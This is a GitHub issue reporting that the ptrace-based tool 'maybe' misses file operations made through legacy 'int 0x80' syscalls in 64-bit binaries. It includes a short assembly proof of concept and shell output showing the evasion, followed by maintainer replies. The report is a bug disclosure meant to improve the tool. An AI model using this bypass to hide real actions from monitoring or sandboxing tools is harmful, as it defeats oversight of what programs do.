Skip to content
This repository has been archived by the owner on Nov 11, 2018. It is now read-only.

easy to bypass in linux 64 bit #35

Open
hc0d3r opened this issue Aug 27, 2016 · 2 comments
Open

easy to bypass in linux 64 bit #35

hc0d3r opened this issue Aug 27, 2016 · 2 comments
Labels
bug
Milestone
v1.0

Comments

@hc0d3r
Copy link

hc0d3r commented Aug 27, 2016

using int 0x80 in a elf-64 binary, its easy to bypass, example:

test.asm

section .text
    global _start
section .rodata
    x db '/tmp/abcd',0x0

_start:
    mov eax, 5
    mov ebx, x
    mov ecx, 64
    mov edx, 0644
    int 0x80

    xor eax, eax
    inc eax
    int 0x80
$ nasm -f elf64 test.asm
$ ld -o test test.o
$ rm -f abcd
$ [ -e "abcd" ] && echo file found
$ maybe ./test
maybe has not detected any file system operations from ./test.
$ [ -e "abcd" ] && echo file found
file found
@Potherca
Copy link

Do you have a suggestion for a fix?

@p-e-w p-e-w added the bug label Dec 11, 2016
@p-e-w
Copy link
Owner

p-e-w commented Dec 11, 2016

That's odd indeed... I was under the impression that syscall was just an alias for int 0x80. If that technique worked in general, all ptrace sandboxes would be ineffective, so the fault must lie either with maybe or with python-ptrace.

@p-e-w p-e-w added this to the v1.0 milestone Dec 11, 2016
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
bug
Projects
None yet
Milestone
v1.0
Development

No branches or pull requests
3 participants
@Potherca @p-e-w @hc0d3r